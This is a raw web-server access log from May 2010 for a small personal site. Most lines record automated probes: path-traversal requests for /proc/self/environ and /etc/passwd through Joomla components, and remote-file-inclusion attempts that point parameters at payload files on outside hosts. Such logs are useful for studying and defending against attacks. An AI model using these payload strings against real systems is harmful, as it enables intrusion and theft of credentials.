174.136.55.175 - - [07/May/2010:22:18:58 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.823"
174.136.55.175 - - [07/May/2010:22:18:59 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.823"
174.136.55.175 - - [07/May/2010:22:18:59 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.823"
72.18.155.234 - - [07/May/2010:22:20:23 -0500] "GET /logs/access_log.1262304000////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:23 -0500] "GET /logs////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:23 -0500] "GET ////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:26 -0500] "GET ////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:26 -0500] "GET /logs////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:26 -0500] "GET /logs/access_log.1262304000////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET /logs////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET ////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET /logs/access_log.1262304000////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET ////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET /logs////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.18.155.234 - - [07/May/2010:22:20:27 -0500] "GET /logs/access_log.1262304000////write_comment_update.php?board_skin_path=http://www.myhappyclinic.co.kr//web_log/id1.txt????????????????%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
80.88.16.30 - - [07/May/2010:22:22:07 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.826"
80.88.16.30 - - [07/May/2010:22:22:07 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.826"
80.88.16.30 - - [07/May/2010:22:22:08 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.826"
87.250.255.243 - - [07/May/2010:22:22:08 -0500] "GET /logs/access_log.1226361600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.201.218 - - [07/May/2010:22:22:49 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:22:50 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:22:50 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:22:59 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:22:59 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:22:59 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.803"
119.235.18.119 - - [07/May/2010:22:23:38 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
96.9.146.197 - - [07/May/2010:22:25:37 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.831"
96.9.146.197 - - [07/May/2010:22:25:37 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.831"
96.9.146.197 - - [07/May/2010:22:25:37 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.831"
124.49.100.254 - - [07/May/2010:22:27:51 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:27:51 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:27:51 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:28:13 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:28:13 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:28:14 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
189.108.172.26 - - [07/May/2010:22:30:41 -0500] "GET /logs/access_log.1272067200/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [07/May/2010:22:30:42 -0500] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [07/May/2010:22:30:42 -0500] "GET /logs/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
124.49.100.254 - - [07/May/2010:22:33:27 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:33:28 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:33:28 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:22:34:21 -0500] "GET /logs/access_log.1257465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [07/May/2010:22:39:56 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.239.161.143 - - [07/May/2010:22:39:56 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.239.161.143 - - [07/May/2010:22:39:56 -0500] "GET /logs/access_log.1270598400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:43:02 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.49.100.254 - - [07/May/2010:22:43:24 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:22:44:47 -0500] "GET /artwork/flagart.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.187 - - [07/May/2010:22:46:20 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [07/May/2010:22:50:16 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
119.235.18.119 - - [07/May/2010:22:52:18 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.831"
207.46.13.132 - - [07/May/2010:22:52:20 -0500] "GET /logs/access_log.1250121600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [07/May/2010:22:55:12 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.133 - - [07/May/2010:22:56:21 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [07/May/2010:23:07:22 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.173.194.130 - - [07/May/2010:23:16:26 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:26 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:26 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:31 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:34 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:34 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:39 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:16:44 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:23:17:48 -0500] "GET /logs/access_log.1239408000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.43 - - [07/May/2010:23:21:20 -0500] "GET /logs/access_log.1158278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [07/May/2010:23:23:47 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
70.38.117.233 - - [07/May/2010:23:24:09 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
70.38.117.233 - - [07/May/2010:23:24:09 -0500] "GET /logs/access_log.1223683200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.117.233 - - [07/May/2010:23:24:09 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.129.119.43 - - [07/May/2010:23:25:09 -0500] "GET /logs/access_log.1253491200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:23:26:30 -0500] "GET /logs/access_log.1225497600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.173.194.130 - - [07/May/2010:23:27:08 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:27:08 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:27:08 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:27:33 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:27:33 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
217.173.194.130 - - [07/May/2010:23:27:38 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.129.119.40 - - [07/May/2010:23:29:14 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.131 - - [07/May/2010:23:33:59 -0500] "GET /logs/access_log.1243555200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [07/May/2010:23:37:03 -0500] "GET /logs/access_log.1272931200 HTTP/1.1" 200 456940 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [07/May/2010:23:49:17 -0500] "GET /logs/access_log.1270252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.146 - - [07/May/2010:23:49:50 -0500] "GET /logs/access_log.1267747200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.135 - - [07/May/2010:23:56:21 -0500] "GET /?D=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.56.29.84 - - [07/May/2010:23:56:34 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=22&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dbert%2Bgrimm%2Btattoo%2Bflash%26start%3D20%26um%3D1%26hl%3Den%26client%3Dsafari%26sa%3DN%26rls%3Den%26ndsp%3D20%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:35 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:35 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:35 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:35 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:56:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:04 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:05 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:05 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
70.56.29.84 - - [07/May/2010:23:57:05 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
207.46.195.229 - - [07/May/2010:23:58:51 -0500] "GET /logs/access_log.1260057600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.68.135 - - [08/May/2010:00:00:37 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""libwww-perl/5.834"
174.142.68.135 - - [08/May/2010:00:00:37 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.250.255.243 - - [08/May/2010:00:01:36 -0500] "GET /logs/access_log.1258761600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.43.48.82 - - [08/May/2010:00:03:56 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.188.235.66 - - [08/May/2010:00:04:01 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.45.186.2 - - [08/May/2010:00:04:07 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.56.172.136 - - [08/May/2010:00:04:18 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.188.235.66 - - [08/May/2010:00:05:34 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.188.235.66 - - [08/May/2010:00:05:34 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
204.188.235.66 - - [08/May/2010:00:05:34 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
207.45.186.2 - - [08/May/2010:00:05:44 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
207.45.186.2 - - [08/May/2010:00:05:44 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
207.45.186.2 - - [08/May/2010:00:05:44 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
200.11.75.68 - - [08/May/2010:00:06:15 -0500] "GET /logs/access_log.1272067200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:06:15 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:06:15 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.11.75.68 - - [08/May/2010:00:07:02 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.songofspirit.com/id-1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.43.48.82 - - [08/May/2010:00:07:24 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
208.43.48.82 - - [08/May/2010:00:07:24 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
208.43.48.82 - - [08/May/2010:00:07:24 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
195.56.172.136 - - [08/May/2010:00:07:29 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
